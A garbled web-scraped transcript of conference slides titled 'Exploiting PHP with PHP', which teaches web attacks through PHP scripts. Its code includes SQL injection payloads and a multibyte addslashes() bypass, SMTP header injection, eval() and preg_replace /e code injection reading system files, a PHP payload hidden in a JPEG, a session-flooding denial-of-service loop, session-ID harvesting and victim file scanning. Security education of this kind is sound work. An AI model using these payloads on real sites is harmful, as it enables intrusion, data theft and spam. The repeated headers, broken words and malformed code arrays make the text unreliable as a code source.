exploiting php with php 090310160027 phpapp01
TRANSCRIPT
8/10/2019 Exploiting Php With Php 090310160027 Phpapp01
http://slidepdf.com/reader/full/exploiting-php-with-php-090310160027-phpapp01 1/71
Exploiting PHPwith PHP
Exploiting PHP with PHP Arpad Ray @ PHPNW08
8/10/2019 Exploiting Php With Php 090310160027 Phpapp01
http://slidepdf.com/reader/full/exploiting-php-with-php-090310160027-phpapp01 2/71
Exploiting PHPwith PHP
Why use PHP for this?• We already know how to write PHP
8/10/2019 Exploiting Php With Php 090310160027 Phpapp01
http://slidepdf.com/reader/full/exploiting-php-with-php-090310160027-phpapp01 3/71
Exploiting PHPwith PHP
Why use PHP for this?• We already know how to write PHP
• Can use directly in test scripts
8/10/2019 Exploiting Php With Php 090310160027 Phpapp01
http://slidepdf.com/reader/full/exploiting-php-with-php-090310160027-phpapp01 4/71
Exploiting PHPwith PHP
Why use PHP for this?• We already know how to write PHP
• Can use directly in test scripts
• PHP provides everything we need
8/10/2019 Exploiting Php With Php 090310160027 Phpapp01
http://slidepdf.com/reader/full/exploiting-php-with-php-090310160027-phpapp01 5/71
Exploiting PHPwith PHP
Why use PHP for this?• We already know how to write PHP
• Can use directly in test scripts
• PHP provides everything we need• Writing PHP can be very quick
8/10/2019 Exploiting Php With Php 090310160027 Phpapp01
http://slidepdf.com/reader/full/exploiting-php-with-php-090310160027-phpapp01 6/71
Exploiting PHPwith PHP
Why use PHP for this?• We already know how to write PHP
• Can use directly in test scripts
• PHP provides everything we need• Writing PHP can be very quick
• Can efficiently re-use and combine attacks
8/10/2019 Exploiting Php With Php 090310160027 Phpapp01
http://slidepdf.com/reader/full/exploiting-php-with-php-090310160027-phpapp01 7/71
Exploiting PHPwith PHP
SQL injection• Probably the first attack most PHP
developers hear of
8/10/2019 Exploiting Php With Php 090310160027 Phpapp01
http://slidepdf.com/reader/full/exploiting-php-with-php-090310160027-phpapp01 8/71
Exploiting PHPwith PHP
SQL injection
$q = "SELECT * FROM foobar WHERE id = $_GET[id]";
8/10/2019 Exploiting Php With Php 090310160027 Phpapp01
http://slidepdf.com/reader/full/exploiting-php-with-php-090310160027-phpapp01 9/71
Exploiting PHPwith PHP
SQL injection
$q = "SELECT * FROM foobar WHERE id = $_GET[id]";
index.php?id=1 OR 1=1$_GET['id'] = '1 OR 1=1';
8/10/2019 Exploiting Php With Php 090310160027 Phpapp01
http://slidepdf.com/reader/full/exploiting-php-with-php-090310160027-phpapp01 10/71
Exploiting PHPwith PHP
SQL injection
$q = "SELECT * FROM foobar WHERE id = $_GET[id]";
index.php?id=1 OR 1=1$_GET['id'] = '1 OR 1=1';
$q = "SELECT * FROM foobar WHERE id = 1 OR 1=1 ";
8/10/2019 Exploiting Php With Php 090310160027 Phpapp01
http://slidepdf.com/reader/full/exploiting-php-with-php-090310160027-phpapp01 11/71
Exploiting PHPwith PHP
SQL injection
$q = "SELECT * FROM foobar WHERE id = '$_GET[id] '";
8/10/2019 Exploiting Php With Php 090310160027 Phpapp01
http://slidepdf.com/reader/full/exploiting-php-with-php-090310160027-phpapp01 12/71
Exploiting PHPwith PHP
SQL injection
$q = "SELECT * FROM foobar WHERE id = '$_GET[id] '";
index.php?id=' OR ''='$_GET['id'] = “' OR ''='”;
8/10/2019 Exploiting Php With Php 090310160027 Phpapp01
http://slidepdf.com/reader/full/exploiting-php-with-php-090310160027-phpapp01 13/71
Exploiting PHPwith PHP
SQL injection
$q = "SELECT * FROM foobar WHERE id = '$_GET[id] '";
index.php?id=' OR ''='$_GET['id'] = “' OR ''='”;
$q = "SELECT * FROM foobar WHERE id = '' OR ''=' '";
8/10/2019 Exploiting Php With Php 090310160027 Phpapp01
http://slidepdf.com/reader/full/exploiting-php-with-php-090310160027-phpapp01 14/71
Exploiting PHPwith PHP
SQL injection
$q = "SELECT * FROM foobar WHERE id = '$_POST[id] '";
8/10/2019 Exploiting Php With Php 090310160027 Phpapp01
http://slidepdf.com/reader/full/exploiting-php-with-php-090310160027-phpapp01 15/71
Exploiting PHPwith PHP
SQL injection
$q = "SELECT * FROM foobar WHERE id = $_POST[id]";
<form method=”post” action=” http://example.com/foo.php ”>
<input type=”hidden” name=”id” value=”1 OR 1=1” /> <input type=”submit” />
</form>
8/10/2019 Exploiting Php With Php 090310160027 Phpapp01
http://slidepdf.com/reader/full/exploiting-php-with-php-090310160027-phpapp01 16/71
Exploiting PHPwith PHP
SQL injection
$q = "SELECT * FROM foobar WHERE id = $_POST[id]";
$context = stream_context_create(array('http' => array('method' => 'post''content' => 'id=1 OR 1=1'
)));
file_get_contents(' http://example.com/foo.php ', false, $context);
8/10/2019 Exploiting Php With Php 090310160027 Phpapp01
http://slidepdf.com/reader/full/exploiting-php-with-php-090310160027-phpapp01 17/71
Exploiting PHPwith PHP
SQL injection
$q = 'SELECT * FROM foobar WHERE id = ' . addslashes($id);
8/10/2019 Exploiting Php With Php 090310160027 Phpapp01
http://slidepdf.com/reader/full/exploiting-php-with-php-090310160027-phpapp01 18/71
Exploiting PHP
with PHP
addslashes()
$id = addslashes($_POST['id']);
$q = "SELECT * FROM foobar WHERE id = '$id'";
$_POST['id'] = “' OR ''='”;
$q = "SELECT * FROM foobar WHERE id = '\' OR \'\'=\'' ";
8/10/2019 Exploiting Php With Php 090310160027 Phpapp01
http://slidepdf.com/reader/full/exploiting-php-with-php-090310160027-phpapp01 19/71
Exploiting PHP
with PHP
addslashes() • Getting around that pesky backslash
8/10/2019 Exploiting Php With Php 090310160027 Phpapp01
http://slidepdf.com/reader/full/exploiting-php-with-php-090310160027-phpapp01 20/71
Exploiting PHP
with PHP
addslashes() • Getting around that pesky backslash
• Multi-byte character attacks
8/10/2019 Exploiting Php With Php 090310160027 Phpapp01
http://slidepdf.com/reader/full/exploiting-php-with-php-090310160027-phpapp01 21/71
Exploiting PHP
with PHP
addslashes() • Getting around that pesky backslash
• Multi-byte character attacks
• Swallow the backslash with a multi-bytecharacter ending with that byte
8/10/2019 Exploiting Php With Php 090310160027 Phpapp01
http://slidepdf.com/reader/full/exploiting-php-with-php-090310160027-phpapp01 22/71
Exploiting PHP
with PHP
addslashes() • Getting around that pesky backslash
• Multi-byte character attacks
• Swallow the backslash with a multi-bytecharacter ending with that byte
• <start of mb character><single quote>// apply addslashes()<mb character><single quote>
8/10/2019 Exploiting Php With Php 090310160027 Phpapp01
http://slidepdf.com/reader/full/exploiting-php-with-php-090310160027-phpapp01 23/71
Exploiting PHP
with PHP
addslashes()
$mbCharacter = "\xBF\x5C";$quote = substr($mbCharacter, 0, -1) . '\'';
8/10/2019 Exploiting Php With Php 090310160027 Phpapp01
http://slidepdf.com/reader/full/exploiting-php-with-php-090310160027-phpapp01 24/71
Exploiting PHP
with PHP
addslashes()
$mbCharacter = "\xBF\x5C";$quote = substr($mbCharacter, 0, -1) . '\'';
$id = "$quote OR $quote$quote = $quote ";$context = stream_context_create(array('http' => array(
'method' => 'post''content' => http_build_query(array('id' => $id))
)));file_get_contents('http://example.com/foo.php', false, $context);
$q = "SELECT * FROM foobar WHERE id = '?' OR '?'='? '";
8/10/2019 Exploiting Php With Php 090310160027 Phpapp01
http://slidepdf.com/reader/full/exploiting-php-with-php-090310160027-phpapp01 25/71
Exploiting PHP
with PHP
addslashes()
$mbCharacter = "\xBF\x5C";$quote = substr($mbCharacter, 0, -1) . '\'';
$id = "$quote OR 1=1 /* ";$context = stream_context_create(array('http' => array(
'method' => 'post''content' => http_build_query(array('id' => $id))
)));file_get_contents('http://example.com/foo.php', false, $context);
$q = "SELECT * FROM foobar WHERE id = '?' OR 1=1 /* '";
8/10/2019 Exploiting Php With Php 090310160027 Phpapp01
http://slidepdf.com/reader/full/exploiting-php-with-php-090310160027-phpapp01 26/71
Exploiting PHP
with PHP
magic_quotes_gpc• Uses addslashes() so escaping is not secure
8/10/2019 Exploiting Php With Php 090310160027 Phpapp01
http://slidepdf.com/reader/full/exploiting-php-with-php-090310160027-phpapp01 27/71
Exploiting PHP
with PHP
magic_quotes_gpc• Uses addslashes() so escaping is not secure• Fosters complacency
8/10/2019 Exploiting Php With Php 090310160027 Phpapp01
http://slidepdf.com/reader/full/exploiting-php-with-php-090310160027-phpapp01 28/71
Exploiting PHP
with PHP
magic_quotes_gpc• Uses addslashes() so escaping is not secure• Fosters complacency
• Applications using magic quotes are muchharder to make truly portable
8/10/2019 Exploiting Php With Php 090310160027 Phpapp01
http://slidepdf.com/reader/full/exploiting-php-with-php-090310160027-phpapp01 29/71
Exploiting PHP
with PHP
magic_quotes_gpc• Uses addslashes() so escaping is not secure• Fosters complacency
• Applications using magic quotes are muchharder to make truly portable
• Inconsistencies between PHP versions
8/10/2019 Exploiting Php With Php 090310160027 Phpapp01
http://slidepdf.com/reader/full/exploiting-php-with-php-090310160027-phpapp01 30/71
Exploiting PHP
with PHP
magic_quotes_gpc$context = stream_context_create(array('http'
=> array('user_agent' => $foo
)));
$context = stream_context_create(array('http'=> array(
'method' => 'get''header' => 'X-Foo: ' . $foo
)));
8/10/2019 Exploiting Php With Php 090310160027 Phpapp01
http://slidepdf.com/reader/full/exploiting-php-with-php-090310160027-phpapp01 31/71
Exploiting PHP
with PHP
magic_quotes_gpc? scalar'1=foo&
array'1[scalar'2]=foo&array'1[array'2][scalar'3]=foo
8/10/2019 Exploiting Php With Php 090310160027 Phpapp01
http://slidepdf.com/reader/full/exploiting-php-with-php-090310160027-phpapp01 32/71
Exploiting PHP
with PHP
magic_quotes_gpc• Expected result:
Array(
[scalar\'1] => foo[array\'1] => Array
([scalar\'2] => foo[array\'2] => Array
([scalar\'3] => foo
))
)
8/10/2019 Exploiting Php With Php 090310160027 Phpapp01
http://slidepdf.com/reader/full/exploiting-php-with-php-090310160027-phpapp01 33/71
Exploiting PHP
with PHP
magic_quotes_gpc• PHP 4.3.3
Array(
[scalar'1 ] => foo[array'1 ] => Array
([scalar'2 ] => foo[array\'2] => Array
([scalar'3 ] => foo
))
)
8/10/2019 Exploiting Php With Php 090310160027 Phpapp01
http://slidepdf.com/reader/full/exploiting-php-with-php-090310160027-phpapp01 34/71
8/10/2019 Exploiting Php With Php 090310160027 Phpapp01
http://slidepdf.com/reader/full/exploiting-php-with-php-090310160027-phpapp01 35/71
Exploiting PHP
with PHP
magic_quotes_gpc• PHP 5.0.0 (OFF)
Array(
[scalar\'1] => foo[array\'1] => Array
([scalar\'2] => foo[array\'2] => Array
([scalar\'3] => foo
))
)
8/10/2019 Exploiting Php With Php 090310160027 Phpapp01
http://slidepdf.com/reader/full/exploiting-php-with-php-090310160027-phpapp01 36/71
Exploiting PHP
with PHP
magic_quotes_gpc• PHP 5.2.2
Array(
[scalar\'1] => foo[array\'1] => Array
([scalar\'2] => foo[array\'2] => Array
([scalar\'3] => foo
))
)
8/10/2019 Exploiting Php With Php 090310160027 Phpapp01
http://slidepdf.com/reader/full/exploiting-php-with-php-090310160027-phpapp01 37/71
Exploiting PHP
with PHP
magic_quotes_gpc• There are also problems disabling
magic_quotes_gpc
8/10/2019 Exploiting Php With Php 090310160027 Phpapp01
http://slidepdf.com/reader/full/exploiting-php-with-php-090310160027-phpapp01 38/71
Exploiting PHP
with PHP
magic_quotes_gpc• There are also problems disabling
magic_quotes_gpc
function stripslashes_deep($value)
{ $value = is_array($value) ?array_map('stripslashes_deep', $value) :stripslashes($value);
return $value;}
i
8/10/2019 Exploiting Php With Php 090310160027 Phpapp01
http://slidepdf.com/reader/full/exploiting-php-with-php-090310160027-phpapp01 39/71
Exploiting PHP
with PHP
magic_quotes_gpc• There are also problems disabling
magic_quotes_gpc
• Instead of passing id=1 we can pass:
'id' . str_repeat('[]', 1000) . '=1'• We can trivially force the web server to do alot of unnecessary work
D i l f S i
8/10/2019 Exploiting Php With Php 090310160027 Phpapp01
http://slidepdf.com/reader/full/exploiting-php-with-php-090310160027-phpapp01 40/71
Exploiting PHP
with PHP
Denial of Service• Failure to release resources
D i l f S i
8/10/2019 Exploiting Php With Php 090310160027 Phpapp01
http://slidepdf.com/reader/full/exploiting-php-with-php-090310160027-phpapp01 41/71
Exploiting PHPwith PHP
Denial of Service• Failure to release resources• Writing user data to disk
D i l f S i
8/10/2019 Exploiting Php With Php 090310160027 Phpapp01
http://slidepdf.com/reader/full/exploiting-php-with-php-090310160027-phpapp01 42/71
Exploiting PHPwith PHP
Denial of Servicefunction fill_sessions($url, $num = 1000)
{$context = stream_context_create(array(
'http' => array(
'method' => 'HEAD')));for ($i = $num; $i--;) {
file_get_contents($url, false, $context);}
}
D i l f S i
8/10/2019 Exploiting Php With Php 090310160027 Phpapp01
http://slidepdf.com/reader/full/exploiting-php-with-php-090310160027-phpapp01 43/71
Exploiting PHPwith PHP
Denial of Service• Failure to release resources• Writing user data to disk
• Locking customer accounts
SMTP i j ti
8/10/2019 Exploiting Php With Php 090310160027 Phpapp01
http://slidepdf.com/reader/full/exploiting-php-with-php-090310160027-phpapp01 44/71
Exploiting PHPwith PHP
SMTP injection
SMTP i j ti
8/10/2019 Exploiting Php With Php 090310160027 Phpapp01
http://slidepdf.com/reader/full/exploiting-php-with-php-090310160027-phpapp01 45/71
Exploiting PHPwith PHP
SMTP injection$to = '[email protected]';$subject = $_POST['subject'];
$from = $_POST['from'];
mail($to, $subject, 'From: ' . $from);
SMTP i j ti
8/10/2019 Exploiting Php With Php 090310160027 Phpapp01
http://slidepdf.com/reader/full/exploiting-php-with-php-090310160027-phpapp01 46/71
Exploiting PHPwith PHP
SMTP injection$context = stream_context_create(array('http' => array(
'method' => 'post'
'content' => http_build_query(array(
'subject' => "foo\r\nCc: [email protected]",
'from' => "[email protected]\r\nCc:[email protected]"
)) )));
SMTP injection
8/10/2019 Exploiting Php With Php 090310160027 Phpapp01
http://slidepdf.com/reader/full/exploiting-php-with-php-090310160027-phpapp01 47/71
Exploiting PHPwith PHP
SMTP injection• Variable mail address
SMTP injection
8/10/2019 Exploiting Php With Php 090310160027 Phpapp01
http://slidepdf.com/reader/full/exploiting-php-with-php-090310160027-phpapp01 48/71
Exploiting PHPwith PHP
SMTP injection• Variable mail address• Sanitisation
SMTP injection
8/10/2019 Exploiting Php With Php 090310160027 Phpapp01
http://slidepdf.com/reader/full/exploiting-php-with-php-090310160027-phpapp01 49/71
Exploiting PHPwith PHP
SMTP injection
• Variable mail address• Sanitisation
• Validation
SMTP injection
8/10/2019 Exploiting Php With Php 090310160027 Phpapp01
http://slidepdf.com/reader/full/exploiting-php-with-php-090310160027-phpapp01 50/71
Exploiting PHPwith PHP
SMTP injection
• Variable mail address• Sanitisation
• Validation
• /^[^@]+@(?:\w+\.)+\w{2,6}$/
Hot vulnerabilities
8/10/2019 Exploiting Php With Php 090310160027 Phpapp01
http://slidepdf.com/reader/full/exploiting-php-with-php-090310160027-phpapp01 51/71
Exploiting PHPwith PHP
Hot vulnerabilities
• Direct eval() injection
Hot vulnerabilities
8/10/2019 Exploiting Php With Php 090310160027 Phpapp01
http://slidepdf.com/reader/full/exploiting-php-with-php-090310160027-phpapp01 52/71
Exploiting PHPwith PHP
Hot vulnerabilities
• Direct eval() injectionclass Foo {
function Foo() {
$a = func_get_args();print_r($a);}
}
eval('$foo = new Foo(' . implode(',', $args) . ');');
Hot vulnerabilities
8/10/2019 Exploiting Php With Php 090310160027 Phpapp01
http://slidepdf.com/reader/full/exploiting-php-with-php-090310160027-phpapp01 53/71
Exploiting PHPwith PHP
Hot vulnerabilities
• Direct eval() injection$args[0 ] = 'readfile(“/etc/passed”)';
Hot vulnerabilities
8/10/2019 Exploiting Php With Php 090310160027 Phpapp01
http://slidepdf.com/reader/full/exploiting-php-with-php-090310160027-phpapp01 54/71
Exploiting PHPwith PHP
Hot vulnerabilities
• preg_replace() using /e modifier$s = '$-42 dollars';
preg_replace('/\$(.*?) dollars/e', 'abs($1)', $s)
$s = '42';
Hot vulnerabilities
8/10/2019 Exploiting Php With Php 090310160027 Phpapp01
http://slidepdf.com/reader/full/exploiting-php-with-php-090310160027-phpapp01 55/71
Exploiting PHPwith PHP
Hot vulnerabilities
• preg_replace() using /e modifier$s = '$1).foobar().abs(1 dollars';
preg_replace('/\$(.*?) dollars/e', 'abs($1)', $s)
$s = '4242';
Hot vulnerabilities
8/10/2019 Exploiting Php With Php 090310160027 Phpapp01
http://slidepdf.com/reader/full/exploiting-php-with-php-090310160027-phpapp01 56/71
Exploiting PHPwith PHP
Hot vulnerabilities
• preg_replace() using /e modifier$s = '$1).readfile(chr(47).chr(101)...abs(1 dollars';
preg_replace('/\$(.*?) dollars/e', 'abs($1)', $s)
$s = '4242';
Hot vulnerabilities
8/10/2019 Exploiting Php With Php 090310160027 Phpapp01
http://slidepdf.com/reader/full/exploiting-php-with-php-090310160027-phpapp01 57/71
Exploiting PHPwith PHP
Hot vulnerabilities
• Variable in include() call$page = $_GET['page'];
include $page;
Hot vulnerabilities
8/10/2019 Exploiting Php With Php 090310160027 Phpapp01
http://slidepdf.com/reader/full/exploiting-php-with-php-090310160027-phpapp01 58/71
Exploiting PHPwith PHP
Hot vulnerabilities
• Direct eval() injection• preg_replace() using /e modifier
• Variable in include() call
• Uploading PHP files
Hot vulnerabilities
8/10/2019 Exploiting Php With Php 090310160027 Phpapp01
http://slidepdf.com/reader/full/exploiting-php-with-php-090310160027-phpapp01 59/71
Exploiting PHPwith PHP
Hot vulnerabilities
• Uploading PHP files• Check file extension
• Check uploaded MIME type
• Check file MIME type
• Move outside of web root
Hot vulnerabilities
8/10/2019 Exploiting Php With Php 090310160027 Phpapp01
http://slidepdf.com/reader/full/exploiting-php-with-php-090310160027-phpapp01 60/71
Exploiting PHPwith PHP
Hot vulnerabilities
$script = <<<EOT<?phpvar_dump('hello world!');EOT;$jpeg = '/path/to/some_valid.jpg';
$fp = fopen($jpeg, 'ab');fwrite($fp, $script);fclose($fp);
Hot vulnerabilities
8/10/2019 Exploiting Php With Php 090310160027 Phpapp01
http://slidepdf.com/reader/full/exploiting-php-with-php-090310160027-phpapp01 61/71
Exploiting PHPwith PHP
Hot vulnerabilities
• Direct eval() injection• preg_replace() using /e modifier
• Variable in include() call
• Uploading PHP files
8/10/2019 Exploiting Php With Php 090310160027 Phpapp01
http://slidepdf.com/reader/full/exploiting-php-with-php-090310160027-phpapp01 62/71
Making an evil website
8/10/2019 Exploiting Php With Php 090310160027 Phpapp01
http://slidepdf.com/reader/full/exploiting-php-with-php-090310160027-phpapp01 63/71
Exploiting PHPwith PHP
Making an evil website
• HTTP requests can give us lots of interestinginformation
• PHPSESSID = bingo
Making an evil website
8/10/2019 Exploiting Php With Php 090310160027 Phpapp01
http://slidepdf.com/reader/full/exploiting-php-with-php-090310160027-phpapp01 64/71
Exploiting PHPwith PHP
Making an evil websiteif (isset($_SESSION['HTTP_REFERER'])) {if (preg_match('
/PHPSESSID=([^=&]+)
/xi',$_SESSION['HTTP_REFERER']));
}
Making an evil website
8/10/2019 Exploiting Php With Php 090310160027 Phpapp01
http://slidepdf.com/reader/full/exploiting-php-with-php-090310160027-phpapp01 65/71
Exploiting PHPwith PHP
Making an evil websiteif (isset($_SESSION['HTTP_REFERER'])) {if (preg_match('
/PHPSESSID=([^=&]+)|(?<==)([a-f\d]{32}|[a-f\d]{40})\b
/xi',
$_SESSION['HTTP_REFERER']));}
Making use of victims
8/10/2019 Exploiting Php With Php 090310160027 Phpapp01
http://slidepdf.com/reader/full/exploiting-php-with-php-090310160027-phpapp01 66/71
Exploiting PHPwith PHP
Making use of victims
• File scan
Making use of victims
8/10/2019 Exploiting Php With Php 090310160027 Phpapp01
http://slidepdf.com/reader/full/exploiting-php-with-php-090310160027-phpapp01 67/71
Exploiting PHPwith PHP
Making use of victims
• File scan$dir = new RecursiveIteratorIterator(
new RecursiveDirectoryIterator('/', true)
);
foreach ($dir as $file) {
echo $file->getPathname(), "\n";}
Making use of victims
8/10/2019 Exploiting Php With Php 090310160027 Phpapp01
http://slidepdf.com/reader/full/exploiting-php-with-php-090310160027-phpapp01 68/71
Exploiting PHPwith PHP
g
• File scan• Subverting existing files
Making use of victims
8/10/2019 Exploiting Php With Php 090310160027 Phpapp01
http://slidepdf.com/reader/full/exploiting-php-with-php-090310160027-phpapp01 69/71
Exploiting PHPwith PHP
g
• File scan• Subverting existing files
• Escalate privileges, take over machine
Making use of victims
8/10/2019 Exploiting Php With Php 090310160027 Phpapp01
http://slidepdf.com/reader/full/exploiting-php-with-php-090310160027-phpapp01 70/71
Exploiting PHPwith PHP
g
• File scan• Subverting existing files
• Escalate privileges, take over machine
• botnet.php
Questions?
8/10/2019 Exploiting Php With Php 090310160027 Phpapp01
http://slidepdf.com/reader/full/exploiting-php-with-php-090310160027-phpapp01 71/71
Exploiting PHPwith PHP
Q